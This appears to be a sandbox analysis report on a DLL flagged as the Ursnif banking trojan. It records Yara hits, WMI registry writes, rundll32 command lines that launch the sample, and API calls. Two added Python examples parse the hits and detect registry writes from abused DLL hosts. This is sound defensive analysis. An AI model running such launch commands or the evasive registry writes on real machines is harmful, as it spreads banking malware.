                      Source: Yara match | File source: 00000003.00000003.577142287.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.621678183.0000000004F4B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.574590732.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.573615076.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.828440646.00000000030D0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.574198555.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.573998703.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.576726243.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.619056224.000000000334B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.577395162.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.578289206.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.576921901.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.573750690.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.573091337.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.707612619.000000000314F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.574533141.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.711256543.0000000004D4F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.576829931.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.664577952.000000000324D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.667981816.0000000004E4D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.577047375.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.576567742.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6444, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4352, type: MEMORYSTR
                      Source: Yara match | File source: 2.3.rundll32.exe.2f3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.2f194a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.2f3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.loaddll32.exe.d5a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.3.rundll32.exe.68a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.4da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.49494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.3.rundll32.exe.68a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.c40000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.49494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.loaddll32.exe.d5a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.8da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.8da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.4da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.2f194a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.828285916.0000000002F19000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.512556680.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.492597168.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.829472336.0000000004949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000003.512003320.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000003.506220086.0000000000680000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.492790466.0000000002F30000.00000040.00000001.sdmp, type: MEMORY

                      E-Banking Fraud:

                      Yara detected Ursnif
                      Source: Yara match | File source: 00000003.00000002.829711196.0000000004CD0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.573182276.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.575886663.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.577592974.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.577142287.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.621678183.0000000004F4B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.574590732.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.573615076.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.828440646.00000000030D0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.574198555.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.573998703.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.576726243.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.619056224.000000000334B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.577395162.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.578289206.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.576921901.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.573750690.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.573091337.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.707612619.000000000314F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.574533141.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.711256543.0000000004D4F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.576829931.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.664577952.000000000324D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.667981816.0000000004E4D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.577047375.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.576567742.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6444, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4352, type: MEMORYSTR
                      Source: Yara match | File source: 2.3.rundll32.exe.2f3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.2f194a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.2f3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.loaddll32.exe.d5a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.3.rundll32.exe.68a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.4da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.49494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.3.rundll32.exe.68a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.c40000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.49494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.loaddll32.exe.d5a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.8da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.8da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.4da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.2f194a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.828285916.0000000002F19000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.512556680.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.492597168.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.829472336.0000000004949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000003.512003320.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000003.506220086.0000000000680000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.492790466.0000000002F30000.00000040.00000001.sdmp, type: MEMORY
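
The identifiers printed after each Yara match (here and in the list that precedes the E-Banking Fraud heading) say where in the analysis the rule fired. The parser below is an added example, not part of the Joe Sandbox report: it reads such lines and groups the hits by analysed process and by the base address of the region or unpacked PE that matched, which is the question an analyst actually wants answered (which regions hold the unpacked Ursnif payload, and which hits are most likely the sample DLL itself mapped at the same base, 0x6E7C0000, in several processes). The field meanings it relies on are assumptions drawn from the report's own naming: in `P.T.N.BASE.X.Y.sdmp` the first field is the process index that also prefixes the `0_2_...` / `3_2_...` code-function addresses, the second is 2 for a dump taken at process end and 3 for one taken during execution, BASE is the region's base address, and the two trailing fields are left opaque; in `P.T.image.BASE.n[.raw].unpack` the image is the host process and BASE is the unpacked PE's load address. The sample lines are a constructed subset of the list above; the parser accepts both the separated and the fused `Yara matchFile source:` spelling.

```python
"""Group Joe Sandbox "Yara match" source identifiers by process and region.

Added example; the field semantics below are assumptions, see the lead-in.
"""
import re
from collections import defaultdict

# P.T.N.BASE.X.Y.sdmp : process index, dump phase, counter, base, two opaque fields
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<phase>[0-9a-f]{8})\.\d+\."
    r"(?P<base>[0-9a-f]{16})\.[0-9a-f]{8}\.[0-9a-f]{8}\.sdmp$", re.I)
# P.T.image.BASE.n[.raw].unpack : process index, phase, host image, load address
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<phase>\d+)\.(?P<image>.+?\.exe)\."
    r"(?P<base>[0-9a-f]+)\.(?P<n>\d+)(?P<raw>\.raw)?\.unpack$", re.I)
MEMSTR_RE = re.compile(r"^Process Memory Space: (?P<image>\S+) PID: (?P<pid>\d+)$")
# \W* tolerates both "Yara match | File source:" and the fused "Yara matchFile source:"
LINE_RE = re.compile(r"Source: Yara match\W*File source: (?P<src>.+?), type: (?P<type>\w+)\s*$")


def parse_source(src):
    """Decode one identifier into a uniform record (kind, proc, phase, image, base, raw, pid)."""
    m = SDMP_RE.match(src)
    if m:
        return {"kind": "sdmp", "proc": int(m["proc"], 16), "phase": int(m["phase"], 16),
                "image": None, "base": int(m["base"], 16), "raw": False, "pid": None}
    m = UNPACK_RE.match(src)
    if m:
        return {"kind": "unpack", "proc": int(m["proc"]), "phase": int(m["phase"]),
                "image": m["image"], "base": int(m["base"], 16),
                "raw": m["raw"] is not None, "pid": None}
    m = MEMSTR_RE.match(src)
    if m:
        return {"kind": "memstr", "proc": None, "phase": None, "image": m["image"],
                "base": None, "raw": False, "pid": int(m["pid"])}
    raise ValueError("unrecognised source identifier: " + src)


def parse_report(text):
    """Return one record per 'Yara match' line, with the report's type column attached."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            rec = parse_source(m["src"].strip())
            rec["type"] = m["type"]
            hits.append(rec)
    return hits


def process_images(hits):
    """Process index -> host image, learned from the .unpack names."""
    images = {}
    for h in hits:
        if h["kind"] == "unpack":
            images.setdefault(h["proc"], h["image"])
    return images


def unpacked_pe_bases(hits):
    """Process index -> sorted load addresses at which an unpacked PE matched."""
    bases = defaultdict(set)
    for h in hits:
        if h["type"] == "UNPACKEDPE":
            bases[h["proc"]].add(h["base"])
    return {p: sorted(b) for p, b in bases.items()}


def shared_module_bases(hits):
    """Load addresses matched in more than one process: a module at the same base
    in several processes is usually the sample DLL, not an injected payload."""
    procs_at = defaultdict(set)
    for h in hits:
        if h["type"] == "UNPACKEDPE":
            procs_at[h["base"]].add(h["proc"])
    return sorted(b for b, procs in procs_at.items() if len(procs) > 1)


# Constructed subset of the report's list (same identifiers, separated spelling).
SAMPLE = """\
Source: Yara match | File source: 00000003.00000002.829472336.0000000004949000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.512556680.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6444, type: MEMORYSTR
Source: Yara match | File source: 0.2.loaddll32.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.loaddll32.exe.d5a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.49494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.4da31a.0.unpack, type: UNPACKEDPE
"""

if __name__ == "__main__":
    hits = parse_report(SAMPLE)
    images = process_images(hits)
    for proc, bases in sorted(unpacked_pe_bases(hits).items()):
        print(f"process {proc} ({images.get(proc, '?')}): " + ", ".join(hex(b) for b in bases))
    print("shared across processes:", [hex(b) for b in shared_module_bases(hits)])
```

Run over the full list rather than the sample, the same grouping separates the per-process payload regions (0xC40000 in loaddll32.exe, 0x8F0000 in rundll32.exe) from the shared module at 0x6E7C0000 and from the `.raw` variants, which are the file-layout copies of the same unpacked images.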

                      System Summary:

                      Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMI
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: m87xfb63XU.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 876
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E7C21B4
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00C44C40
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00C42B76
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00C4AF24
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E7D5600
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E80D630
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E823CCE
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E80B597
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E81A2B1
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E7FE8C0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_008F4C40
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_008FAF24
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_008F2B76
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E7D5600
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E80D630
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E80B597
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E81A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E7FE8C0
                      Source: C:\Windows\System32\loaddll32.exe | Code function: String function: 6E7FABD1 appears 91 times
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6E7FABD1 appears 91 times
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E7C1273 NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E7C15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E7C13B8 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E7C23D5 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00C45D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00C4B149 NtQueryVirtualMemory,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_008F5D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_008FB149 NtQueryVirtualMemory,
                      Source: m87xfb63XU.dll | ReversingLabs: Detection: 22%
                      Source: m87xfb63XU.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll'
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Often
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 876
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 832
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 640
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 640
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Often
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 640
                      Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
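
The registry writes above go through the WMI StdRegProv class rather than the Win32 registry API, so a detection that only watches RegSetValue-style events will miss them. The following is an added example, not part of the sandbox report: detection logic that flags StdRegProv write methods and raises the severity when the caller is a script or DLL host such as rundll32.exe or the sandbox's own loader loaddll32.exe. The input records are constructed to resemble Microsoft-Windows-WMI-Activity trace events, whose Operation text has the same shape as the sandbox's "IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue" lines; the exact field names (Operation, ClientProcessId), the process table and the PIDs 6444 and 4352 from this report's process tree are assumptions made for the example.

```python
"""Flag registry writes issued through the WMI StdRegProv class.

Added example; the event layout and process table are constructed (see lead-in).
"""
import re

# "... IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue"
OPERATION_RE = re.compile(
    r"IWbemServices::(?P<call>\w+) - (?P<namespace>\S+) : "
    r"(?P<cls>\w+)::(?P<method>\w+)$")

# StdRegProv methods that change the registry; Get*/Enum* only read it.
REG_WRITE_PREFIXES = ("Set", "Create", "Delete")
# Script/DLL hosts that have no business writing registry values over WMI.
LOLBIN_HOSTS = {"rundll32.exe", "regsvr32.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "loaddll32.exe"}


def parse_operation(operation):
    """Return (call, namespace, class, method) for an ExecMethod operation,
    or None for queries and anything else without a Class::Method target."""
    m = OPERATION_RE.search(operation)
    if not m or m["call"] != "ExecMethod":
        return None
    return m["call"], m["namespace"], m["cls"], m["method"]


def classify(event, processes):
    """Return an alert for a StdRegProv write, None for reads and non-registry calls."""
    parsed = parse_operation(event["Operation"])
    if parsed is None:
        return None
    _, namespace, cls, method = parsed
    if cls != "StdRegProv" or not method.startswith(REG_WRITE_PREFIXES):
        return None
    image = processes.get(event["ClientProcessId"], "<unknown>")
    severity = "high" if image.lower() in LOLBIN_HOSTS else "medium"
    return {"pid": event["ClientProcessId"], "image": image,
            "namespace": namespace, "method": method, "severity": severity}


def detect(events, processes):
    """Run classify() over a batch of events and collect the alerts in order."""
    return [a for a in (classify(ev, processes) for ev in events) if a]


# Constructed sample data; PIDs 6444 and 4352 mirror the report's process tree.
PROCESSES = {6444: "loaddll32.exe", 4352: "rundll32.exe",
             7100: "mmc.exe", 8000: "explorer.exe"}
EVENTS = [
    {"ClientProcessId": 7100, "Operation": "Start IWbemServices::ExecQuery - root\\cimv2 : SELECT * FROM Win32_OperatingSystem"},
    {"ClientProcessId": 6444, "Operation": "Start IWbemServices::ExecMethod - root\\default : StdRegProv::GetStringValue"},
    {"ClientProcessId": 6444, "Operation": "Start IWbemServices::ExecMethod - root\\default : StdRegProv::SetDWORDValue"},
    {"ClientProcessId": 4352, "Operation": "Start IWbemServices::ExecMethod - root\\default : StdRegProv::SetBinaryValue"},
    {"ClientProcessId": 4352, "Operation": "Start IWbemServices::ExecMethod - root\\default : StdRegProv::SetStringValue"},
    {"ClientProcessId": 8000, "Operation": "Start IWbemServices::ExecMethod - root\\default : StdRegProv::SetStringValue"},
]

if __name__ == "__main__":
    for a in detect(EVENTS, PROCESSES):
        print(f"[{a['severity']}] pid={a['pid']} {a['image']} "
              f"StdRegProv::{a['method']} via {a['namespace']}")
```

The GetStringValue call from loaddll32.exe is deliberately not alerted: reads of the registry over WMI are common in administrative tooling, and what distinguishes this sample is the Set* sequence (DWORD, binary, string) coming from a DLL host.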
                      Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAFBA.tmp
                      Source: classification engine | Classification label: mal88.troj.evad.winDLL@17/12@22/6
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00C44A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6936
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6952
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4520
                      Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
                      Source: m87xfb63XU.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: m87xfb63XU.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
